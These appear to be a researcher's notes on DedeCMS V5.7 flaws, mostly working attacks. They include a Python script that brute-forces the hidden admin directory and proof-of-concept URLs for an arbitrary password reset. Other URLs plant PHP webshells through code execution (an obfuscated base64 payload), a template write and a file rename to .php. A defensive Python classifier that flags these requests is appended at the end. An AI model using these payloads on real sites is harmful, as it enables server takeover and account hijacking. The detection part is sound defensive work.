dedecms

Solving a long-standing DedeCMS problem: finding the admin directory

https://xz.aliyun.com/t/2064
Python script (Python 2, as pasted in the notes):

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2018-10-17 18:57:00
# @Author : Your Name (you@example.org)
# @Link : http://example.org
# @Version : $Id$
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import requests
import itertools

# Characters the admin directory name may contain; the last one ('#') doubles as
# the "no more characters" terminator in the second loop below.
characters = "bacdefghijklmnopqrstuvwxyz0123456789_!#"
back_dir = ""
flag = 0
url = "http://192.168.0.6/uploads/tags.php"
# Forged _FILES array. The "<<" in tmp_name is treated as a wildcard when the server
# checks whether the path exists, so the response reveals whether "./{p}..." matches
# an existing directory (the "Upload filetype not allow" message means it did not).
data = {
    "_FILES[mochazz][tmp_name]": "./{p}<</images/adminico.gif",
    "_FILES[mochazz][name]": 0,
    "_FILES[mochazz][size]": 0,
    "_FILES[mochazz][type]": "image/gif"
}

# Phase 1: find a 1..6 character prefix of the admin directory name.
for num in range(1, 7):
    if flag:
        break
    for pre in itertools.permutations(characters, num):
        pre = ''.join(list(pre))
        data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)
        print "test", pre
        r = requests.post(url, data=data)
        if "Upload filetype not allow" not in r.text and r.status_code == 200:
            flag = 1
            back_dir = pre
            # Reset the template (the original had a typo "_FIES" here, which left the
            # formatted value in place and corrupted the first character of phase 2).
            data["_FILES[mochazz][tmp_name]"] = './{p}<</images/adminico.gif'
            break
        else:
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
print "[+]前缀为:", back_dir

# Phase 2: extend the prefix one character at a time, up to 30 characters.
flag = 0
for i in range(30):
    if flag:
        break
    for ch in characters:
        if ch == characters[-1]:
            # Reached the terminator without a hit: no character extends the name.
            flag = 1
            break
        data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=str(back_dir + ch))
        r = requests.post(url, data=data)
        if "Upload filetype not allow" not in r.text and r.status_code == 200:
            print back_dir
            back_dir += ch
            print "[+]", back_dir
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
            break
        else:
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
print "后台地址为:", back_dir

DedeCMS: using wildcards to find the admin directory, and how to defend against it

https://paper.tuisec.win/detail/d1053143f127862

Check the current DedeCMS version and patch status:

http://120.24.86.145:9008/data/admin/ver.txt

Vulnerability chain | Reproducing and analysing a DedeCMS admin password reset

https://paper.tuisec.win/detail/9f8848f38c37fb4

0x01 Analysis of the front-end arbitrary user password reset
POC:
Step 1: visit
http://192.168.0.6/uploads/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanwser=&id=1 to obtain the key

Step 2: visit
http://192.168.0.6/uploads/member/resetpassword.php?dopost=getpasswd&id=1&key=MojdDnk2

0x02 Front-end arbitrary user login

0x03 Back-end user login

DedeCMS-V5.7-UTF8-SP2

(released 2017-03-15)

DedeCMS v5.7 shops delivery stored XSS

https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS_v5.7_shops_delivery_%E5%AD%98%E5%82%A8%E5%9E%8BXSS
Located in the admin back end's delivery (配送) settings.

DedeCMS V5.7 SP2 back-end getshell

https://xz.aliyun.com/t/2071

DedeCMS V5.7 back-end arbitrary code execution [CVE-2018-7700]

https://paper.tuisec.win/detail/4865b03a4ed783c
poc:

http://192.168.0.6/uploads/dede/tag_test_action.php?url=a&token=&partcode={dede:field name='source' runphp='yes'}fputs(fopen(base64_decode(eWVzaTEucGhw),w),base64_decode(base64_decode(UEhOamNtbHdkQ0JzWVc1bmRXRm5aVDBpY0dod0lqNUFaWFpoYkNna1gxQlBVMVJiZVdWemFURmRLVHd2YzJOeWFYQjBQZz09)));{/dede:field}

Writes yesi1.php with password yesi1

DedeCMS V5.7 SP2 back-end code execution vulnerability

https://paper.tuisec.win/detail/6e00f45732a11ac
poc:

http://192.168.0.6/uploads/dede/tpl.php?filename=yesi.lib.php&action=savetagfile&content=<script language="php">@eval($_POST[yesi1])</script>&token=

Then visit:

http://192.168.0.6/uploads/include/taglib/yesi.lib.php

DedeCMS V5.7 back-end file rename [CVE-2018-9134] getshell

https://paper.tuisec.win/detail/3cfdfcc79be50de

poc:

First upload any file, then:

http://192.168.0.6/dedecms/dede/file_manage_control.php?fmdo=rename&oldfilename=dedecms/yesi.zip&newfilename=dedecms/yesi.php

DedeCMS v5.7 friendly links CSRF getshell

https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS_v5.7_%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5CSRF_GetShell
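Defender-side example, added here and not taken from any of the articles linked in these notes: a small Python 3 classifier that flags the request patterns collected above (the forged `_FILES` wildcard probe against tags.php, the password reset with an empty safety answer, `runphp='yes'` in tag_test_action.php, `savetagfile` writing PHP through tpl.php, and a file_manage_control.php rename to `.php`). It assumes a log source that records method, URL and decoded POST body parameters (a WAF or application log; a plain access log only carries the query string, so the tags.php probe would then show up only as a burst of POSTs). The host `cms.example.test` and the sample requests are constructed; the CVE numbers in the rule names are the ones given in the notes above.

```python
#!/usr/bin/env python3
# Added example for the DedeCMS notes above (not code from the linked articles).
# Assumes a log source that records method, URL and, for POSTs, the body parameters.
import re
from urllib.parse import urlsplit, parse_qsl


def _params(url, body):
    """Merge query-string and body parameters into one dict (blank values kept)."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    pairs += parse_qsl(body or "", keep_blank_values=True)
    return dict(pairs)


def _php_source(s):
    """True if a parameter value carries PHP open tags in either syntax."""
    return re.search(r'<\?(php|=)?|<script\s+language\s*=\s*["\']?php', s, re.I) is not None


# (finding name, required method or None, path regex, predicate over the parameters)
RULES = [
    ("admin directory probe via forged _FILES wildcard", "POST", r"/tags\.php$",
     lambda p: any(k.startswith("_FILES[") and k.endswith("[tmp_name]") and "<<" in v
                   for k, v in p.items())),
    ("member password-reset with empty safety answer", None, r"/member/resetpassword\.php$",
     lambda p: p.get("dopost") == "safequestion" and p.get("safeanwser", "") == ""),
    ("tag_test_action.php partcode with runphp='yes' (CVE-2018-7700 per the notes)", None,
     r"/dede/tag_test_action\.php$",
     lambda p: re.search(r"runphp\s*=\s*['\"]?yes", p.get("partcode", ""), re.I) is not None),
    ("tpl.php savetagfile writing PHP into taglib", None, r"/dede/tpl\.php$",
     lambda p: p.get("action") == "savetagfile" and _php_source(p.get("content", ""))),
    ("file_manage_control.php rename to .php (CVE-2018-9134 per the notes)", None,
     r"/dede/file_manage_control\.php$",
     lambda p: p.get("fmdo") == "rename" and p.get("newfilename", "").lower().endswith(".php")),
]


def classify(method, url, body=None):
    """Return the names of every rule the request matches (empty list if none)."""
    path = urlsplit(url).path
    params = _params(url, body)
    hits = []
    for name, req_method, path_re, pred in RULES:
        if req_method and method.upper() != req_method:
            continue
        if not re.search(path_re, path):
            continue
        if pred(params):
            hits.append(name)
    return hits


# Constructed sample records: one benign request, then one per pattern in the notes.
SAMPLE_REQUESTS = [
    ("GET", "http://cms.example.test/uploads/index.php", None),
    ("POST", "http://cms.example.test/uploads/tags.php",
     "_FILES[mochazz][tmp_name]=./a<</images/adminico.gif&_FILES[mochazz][name]=0"
     "&_FILES[mochazz][size]=0&_FILES[mochazz][type]=image/gif"),
    ("GET", "http://cms.example.test/uploads/member/resetpassword.php"
            "?dopost=safequestion&safequestion=0.0&safeanwser=&id=1", None),
    ("GET", "http://cms.example.test/uploads/dede/tag_test_action.php"
            "?url=a&token=&partcode={dede:field name='source' runphp='yes'}{/dede:field}", None),
    ("GET", "http://cms.example.test/uploads/dede/tpl.php"
            "?filename=x.lib.php&action=savetagfile&content=<script language=\"php\">echo 1;</script>&token=",
     None),
    ("GET", "http://cms.example.test/dedecms/dede/file_manage_control.php"
            "?fmdo=rename&oldfilename=x.zip&newfilename=x.php", None),
]


def scan(requests=SAMPLE_REQUESTS):
    """Map request index -> findings; requests with no finding are left out."""
    result = {}
    for i, (method, url, body) in enumerate(requests):
        hits = classify(method, url, body)
        if hits:
            result[i] = hits
    return result


if __name__ == "__main__":
    for i, hits in scan().items():
        print(i, SAMPLE_REQUESTS[i][1], "->", "; ".join(hits))
```

The path regexes anchor on the script name rather than a fixed prefix, because the notes themselves show the same scripts under `/uploads/` and `/dedecms/`; the `_FILES` rule is restricted to POST since that is how the probe is sent, while the remaining rules accept any method because their parameters also travel in the query string.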
